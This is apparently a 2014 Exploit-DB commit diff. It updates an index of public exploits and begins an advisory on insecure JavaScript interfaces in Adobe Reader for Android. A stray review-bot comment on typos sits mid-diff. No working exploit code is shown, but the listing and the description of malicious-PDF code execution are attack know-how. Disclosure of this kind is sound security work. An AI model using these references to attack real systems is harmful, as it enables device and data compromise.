Updated 04_18_2014

Offensive Security 2014-04-18 04:35:42 +00:00
parent 544779d2f2
commit 46dd79985b
112 changed files with 3861 additions and 179 deletions

118
files.csv

@ -8181,7 +8181,7 @@ id,file,description,date,author,platform,type,port
8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 Products Insecure Cookie Handling Vulnerability",2009-05-14,G4N0K,php,webapps,0
8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-05-14,"ThE g0bL!N",php,webapps,0
8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs",2009-05-14,SirGod,windows,dos,0
8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0
8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0
8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2009-05-14,YEnH4ckEr,php,webapps,0
8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 (arch.php arch) - Local File Inclusion Vulnerability",2009-05-14,Kacper,php,webapps,0
8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 LFI / Remote Command Execution Exploit",2009-05-14,[AVT],php,webapps,0
@ -16149,7 +16149,7 @@ id,file,description,date,author,platform,type,port
18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0
18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0
18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0
18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0
18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0
18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 CSRF (Add Admin - Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0
18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow',",2012-04-04,metasploit,windows,remote,0
@ -22008,7 +22008,7 @@ id,file,description,date,author,platform,type,port
24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0
24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 (index.php, theme param) - Local File Inclusion",2013-03-22,DaOne,php,webapps,0
24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
24872,platforms/windows/local/24872.txt,"Photodex ProShow Producer 5.0.3310 ScsiAccess - Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
24874,platforms/multiple/remote/24874.rb,"Apache Struts ParametersInterceptor Remote Code Execution",2013-03-22,metasploit,multiple,remote,0
24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,metasploit,windows,remote,0
@ -29470,7 +29470,7 @@ id,file,description,date,author,platform,type,port
32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0
32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability",2014-04-05,LiquidWorm,windows,dos,0
32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0
32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0
32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck v1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0
32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0
32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
@ -29483,7 +29483,7 @@ id,file,description,date,author,platform,type,port
32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0
32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0
32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,"Mayank Kapoor",php,webapps,0
32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0
32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0
32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 'login.php' SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0
32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector Directory Traversal",2014-04-07,metasploit,windows,remote,8080
@ -29530,9 +29530,11 @@ id,file,description,date,author,platform,type,port
32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0
32769,platforms/php/remote/32769.php,"PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0
32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0
32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation Vulnerability",2009-02-02,"Ruben Santamarta ",windows,local,0
32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 '.m3u' File Heap Buffer Overflow Vulnerability",2009-02-03,zer0in,windows,dos,0
32773,platforms/php/webapps/32773.txt,"Simple Machines Forum <= 1.1.7 '[url]' Tag HTML Injection Vulnerability",2009-02-03,Xianur0,php,webapps,0
32774,platforms/multiple/dos/32774.txt,"QIP 2005 Malformed Rich Text Message Remote Denial of Service Vulnerability",2009-02-04,ShineShadow,multiple,dos,0
32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service Vulnerability",2009-02-16,"Sami Liedes",linux,dos,0
32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0
32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 Administration Settings Authentication Bypass Vulnerability",2009-02-04,make0day,php,webapps,0
32778,platforms/windows/local/32778.pl,"Password Door 8.4 Local Buffer Overflow Vulnerability",2009-02-05,b3hz4d,windows,local,0
@ -29545,7 +29547,7 @@ id,file,description,date,author,platform,type,port
32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0
32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",2014-04-10,metasploit,unix,remote,443
32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF Vulnerability",2014-04-10,"High-Tech Bridge SA",php,webapps,80
32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL Information Leak Exploit",2014-04-10,prdelka,multiple,remote,443
32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit",2014-04-10,prdelka,multiple,remote,443
32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80
32793,platforms/windows/local/32793.rb,"MS14-017 Microsoft Word RTF Object Confusion",2014-04-10,metasploit,windows,local,0
32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,metasploit,php,remote,80
@ -29554,9 +29556,113 @@ id,file,description,date,author,platform,type,port
32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 'Login.asp' Multiple SQL Injection Vulnerabilities",2009-02-10,"Francesco Bianchino",asp,webapps,0
32798,platforms/multiple/remote/32798.pl,"ProFTPD 1.3 'mod_sql' Username SQL Injection Vulnerability",2009-02-10,AlpHaNiX,multiple,remote,0
32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0
32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0
32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer 'realm' Parameter Cross Site Scripting Vulnerability",2009-02-05,"Jan Skovgren",hardware,remote,0
32802,platforms/php/webapps/32802.txt,"ClipBucket 1.7 'dwnld.php' Directory Traversal Vulnerability",2009-02-16,JIKO,php,webapps,0
32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar 'eventid' Parameter SQL Injection Vulnerability",2008-10-01,r45c4l,php,webapps,0
32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 'phpbb_root_path' Parameter Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability",2009-02-20,"Clément Lecigne",linux,local,0
32806,platforms/php/webapps/32806.txt,"Blue Utopia 'index.php' Local File Include Vulnerability",2009-02-22,PLATEN,php,webapps,0
32807,platforms/php/webapps/32807.txt,"Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability",2009-02-23,"Salvatore Fresta",php,webapps,0
32808,platforms/php/webapps/32808.txt,"Magento 1.2 app/code/core/Mage/Admin/Model/Session.php login[username] Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32809,platforms/php/webapps/32809.txt,"Magento 1.2 app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32810,platforms/php/webapps/32810.txt,"Magento 1.2 downloader/index.php URL XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0
32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution Vulnerability",2009-02-24,"Javier Vicente Vallejo",unix,remote,0
32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0
32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection Vulnerability",2014-04-11,delme,php,webapps,0
32815,platforms/linux/local/32815.c,"Linux Kernel 2.6.x Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness",2009-02-25,"Chris Evans",linux,local,0
32816,platforms/php/webapps/32816.txt,"Orooj CMS 'news.php' SQL Injection Vulnerability",2009-02-25,Cru3l.b0y,php,webapps,0
32817,platforms/osx/dos/32817.txt,"Apple Safari 4 Malformed 'feeds:' URI Null Pointer Dereference Remote Denial Of Service Vulnerability",2009-02-25,Trancer,osx,dos,0
32818,platforms/java/webapps/32818.txt,"JOnAS 4.10.3 'select' Parameter Error Page Cross Site Scripting Vulnerability",2009-02-25,"Digital Security Research Group",java,webapps,0
32819,platforms/php/webapps/32819.txt,"Parsi PHP CMS 2.0 'index.php' SQL Injection Vulnerability",2009-02-26,Cru3l.b0y,php,webapps,0
32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x PKCS#11 Implementation Unauthorized Access Vulnerability",2009-02-26,"Andreas Jellinghaus",linux,local,0
32821,platforms/java/webapps/32821.html,"APC PowerChute Network Shutdown HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2009-02-26,"Digital Security Research Group",java,webapps,0
32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0
32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 Language File Parsing Buffer Overflow Vulnerability",2009-02-27,"musashi karak0rsan",windows,dos,0
32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning Vulnerability",2009-02-27,"Matthew Dempsky",linux,remote,0
32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' Arbitrary File Overwrite Vulnerability",2009-03-02,"Amir Zangeneh",windows,remote,0
32827,platforms/php/webapps/32827.txt,"Afian 'includer.php' Directory Traversal Vulnerability",2009-03-02,vnbrain.net,php,webapps,0
32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 Multiple Cross Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0
32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x 'seccomp' System Call Security Bypass Vulnerability",2009-03-02,"Chris Evans",linux,local,0
32830,platforms/php/webapps/32830.txt,"CubeCart 5.2.8 - Session Fixation",2014-04-13,absane,php,webapps,0
32831,platforms/php/webapps/32831.txt,"Microweber CMS 0.93 - CSRF Vulnerability",2014-04-13,sajith,php,webapps,0
32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 'DtbClsLogin()' Remote Stack Buffer Overflow Vulnerability",2009-03-02,"AbdulAziz Hariri",windows,remote,0
32833,platforms/asp/webapps/32833.txt,"Blogsa 1.0 'Widgets.aspx' Cross Site Scripting Vulnerability",2009-03-02,DJR,asp,webapps,0
32834,platforms/linux/remote/32834.txt,"cURL/libcURL <= 7.19.3 HTTP 'Location:' Redirect Security Bypass Vulnerability",2009-03-03,"David Kierznowski",linux,remote,0
32835,platforms/php/webapps/32835.txt,"NovaBoard 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2009-03-03,"Jose Luis Zayas",php,webapps,0
32836,platforms/multiple/dos/32836.html,"Mozilla Firefox 2.0.x Nested 'window.print()' Denial of Service Vulnerability",2009-03-03,b3hz4d,multiple,dos,0
32837,platforms/linux/remote/32837.py,"Wesnoth 1.x PythonAI Remote Code Execution Vulnerability",2009-02-25,Wesnoth,linux,remote,0
32838,platforms/linux/dos/32838.txt,"MySQL <= 6.0.9 XPath Expression Remote Denial Of Service Vulnerability",2009-02-14,"Shane Bester",linux,dos,0
32839,platforms/multiple/remote/32839.txt,"IBM WebSphere Application Server 6.1/7.0 Administrative Console Cross Site Scripting Vulnerability",2009-02-26,IBM,multiple,remote,0
32840,platforms/php/webapps/32840.txt,"Amoot Web Directory Password Field SQL Injection Vulnerability",2009-03-05,Pouya_Server,php,webapps,0
32841,platforms/php/webapps/32841.txt,"CMSCart 1.04 'maindatafunctions.php' SQL Injection Vulnerability",2009-02-28,"John Martinelli",php,webapps,0
32842,platforms/php/webapps/32842.txt,"UMI CMS 2.7 'fields_filter' Parameter Cross Site Scripting Vulnerability",2009-03-06,"Dmitriy Evteev",php,webapps,0
32843,platforms/php/webapps/32843.txt,"TinX CMS 3.5 'rss.php' SQL Injection Vulnerability",2009-03-06,"Dmitriy Evteev",php,webapps,0
32844,platforms/php/webapps/32844.txt,"PHORTAIL 1.2.1 'poster.php' Multiple HTML Injection Vulnerabilities",2009-03-09,"Jonathan Salwan",php,webapps,0
32845,platforms/windows/local/32845.pl,"IBM Director 5.20 CIM Server Privilege Escalation Vulnerability",2009-03-10,"Bernhard Mueller",windows,local,0
32846,platforms/php/webapps/32846.txt,"Nenriki CMS 0.5 'ID' Cookie SQL Injection Vulnerability",2009-03-10,x0r,php,webapps,0
32847,platforms/multiple/local/32847.txt,"PostgreSQL 8.3.6 Low Cost Function Information Disclosure Vulnerability",2009-03-10,"Andres Freund",multiple,local,0
32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0
32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
32851,platforms/windows/remote/32851.html,"MS14-012 Internet Explorer CMarkup Use-After-Free",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 'tiki-galleries.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 'tiki-list_file_gallery.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 'tiki-listpages.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 'error' Parameter Cross-Site Scripting Vulnerability",2009-03-17,syniack,java,webapps,0
32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentification Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 Duplicate URI Request Denial of Service Vulnerability",2009-03-31,"SCS team",java,dos,0
32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0
32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 'command.shtml' Cross Site Scripting Vulnerability",2009-03-31,"SCS team",java,webapps,0
32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 'search.xml' Cross Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0
32864,platforms/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 'UWCMain' Cross Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0
32865,platforms/multiple/dos/32865.py,"WhatsApp < v2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0
32866,platforms/ios/webapps/32866.txt,"PDF Album v1.7 iOS - File Include Web Vulnerability",2014-04-14,Vulnerability-Lab,ios,webapps,0
32867,platforms/php/webapps/32867.txt,"Wordpress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80
32868,platforms/php/webapps/32868.txt,"Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80
32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console Command Injection",2014-04-14,metasploit,linux,webapps,10080
32870,platforms/cgi/webapps/32870.txt,"AWStats <= 6.4 'awstats.pl' Multiple Path Disclosure Vulnerability",2009-04-19,r0t,cgi,webapps,0
32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 Avtaar Name HTML Injection Vulnerability",2009-03-22,"Adam Baldwin",php,webapps,0
32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 'notepad_body' Parameter SQL Injection Vulnerability",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
32873,platforms/php/webapps/32873.txt,"PHPCMS2008 'ask/search_ajax.php' SQL Injection Vulnerability",2009-03-17,anonymous,php,webapps,0
32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 'search.aspx' Cross Site Scripting Vulnerability",2009-04-01,sk,asp,webapps,0
32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 'product.comparision.php' SQL Injection Vulnerability",2009-03-25,SirGod,php,webapps,0
32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
32877,platforms/multiple/remote/32877.txt,"Xlight FTP Server <= 3.2 'user' SQL Injection Vulnerability",2009-03-19,fla,multiple,remote,0
32878,platforms/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN Cross Site Scripting Vulnerability",2009-03-31,"Bugs NotHugs",hardware,remote,0
32879,platforms/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 'webdbm' Multiple Cross Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",windows,remote,0
32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 'keywords' Parameter Cross Site Scripting Vulnerability",2009-03-31,TEAMELITE,php,webapps,0
32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 Malformed HTML File Remote Denial of Service Vulnerability",2009-04-01,LiquidWorm,windows,dos,0
32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 'viewreport.asp' Cross Site Scripting Vulnerability",2009-04-02,"Bugs NotHugs",asp,webapps,0
32883,platforms/hardware/webapps/32883.txt,"NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080
32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0
32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE",2014-04-15,"Brandon Perry",unix,remote,443
32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080
32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 'oscid' Session Fixation Vulnerability",2009-04-02,laurent.desaulniers,php,webapps,0
32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0
32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0
32890,platforms/unix/remote/32890.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability",2009-04-01,"Richard H. Brain",unix,remote,0
32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/VISTA/2003/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0
32895,platforms/multiple/webapps/32895.txt,"IBM BladeCenter Advanced Management Module 1.42 private/file_management.ssi PATH Parameter XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0
32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 CSRF",2009-04-09,"Henri Lindberg",multiple,webapps,0
32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities",2009-04-09,"Usman Saeed",java,webapps,0
32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 'login.asp' SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",asp,webapps,0
32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass Vulnerability",2009-04-10,"Maksymilian Arciemowicz",php,local,0
32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service Vulnerability",2009-04-11,"Nam Nguyen",windows,dos,0
32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection Vulnerability",2009-04-13,Mormoroth.net,asp,webapps,0
32904,platforms/windows/remote/32904.rb,"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",2014-04-16,metasploit,windows,remote,0
32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 login.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 new_images.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension 'apps/web/vs_diag.cgi' Cross Site Scripting Vulnerability",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0
32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 Cross Site Scripting Vulnerability",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0
32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 User Enumeration Weakness and Multiple Cross Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0
32910,platforms/php/webapps/32910.txt,"Phorum 5.2 admin/badwords.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32911,platforms/php/webapps/32911.txt,"Phorum 5.2 admin/banlist.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32913,platforms/php/webapps/32913.txt,"Phorum 5.2 versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32914,platforms/php/webapps/32914.php,"Geeklog <= 1.5.2 'usersettings.php' SQL Injection Vulnerability",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0
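Review bot: The author field of entry 32771 (`"Ruben Santamarta "`) carries a trailing space inside the quotes, which will make that author sort and group apart from an unspaced spelling elsewhere in the index; if this line is one of the two additions in the `@ -29530,9 +29530,11` hunk it should be trimmed before it lands, since the surrounding rows show no other padded author values. The same check applies to entry 32859 in the last hunk, whose description reads `Authentification Bypass`, presumably a misspelling of `Authentication Bypass` that consumers of this index would display verbatim. The context row for 18697 in the `@ -16149` hunk also has a stray `',` inside its quoted description (`Buffer Overflow',`); this commit does not touch it, but it is worth a follow-up because the rest of the file keeps descriptions as plain quoted text.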


120
platforms/android/local/32884.txt Executable file

@ -0,0 +1,120 @@
------------------------------------------------------------------------
Adobe Reader for Android exposes insecure Javascript interfaces
------------------------------------------------------------------------
Yorick Koster, April 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Adobe Reader for Android [2] exposes several insecure Javascript
interfaces. This issue can be exploited by opening a malicious PDF in
Adobe Reader. Exploiting this issue allows for the execution of
arbitrary Java code, which can result in a compromise of the documents
stored in Reader and files stored on SD card.
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Adobe Reader for Android
version 11.1.3.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Adobe released version 11.2.0 of Adobe Reader that add
@JavascriptInterface [3] annotations to public methods that should be
exposed in the Javascript interfaces. In addition, the app now targets
API Level 17 and contains a static method
(shouldInitializeJavaScript()) that is used to check the device's
Android version.
http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png
Figure 1: Adobe Reader for Android 11.2.0 release notes
------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Adobe Reader for Android allows users to work with PDF documents on an
Android tablet or phone. According to Google Play, the app is installed
on 100 million to 500 million devices.
The following classes expose one or more Javascript interfaces:
- ARJavaScript
- ARCloudPrintActivity
- ARCreatePDFWebView
The app targets API Level 10, which renders the exposed Javascript
interfaces vulnerable to code execution - provided that an attacker
manages to run malicious Javascript code within Adobe Reader.
------------------------------------------------------------------------
PDF Javascript APIs
------------------------------------------------------------------------
It appears that Adobe Reader for Mobile supports [4] a subset of the
Javascript for Acrobat APIs. For some reason the exposed Javscript
objects are prefixed with an underscore character.
public class ARJavaScript
{
[...]
public ARJavaScript(ARViewerActivity paramARViewerActivity)
{
[...]
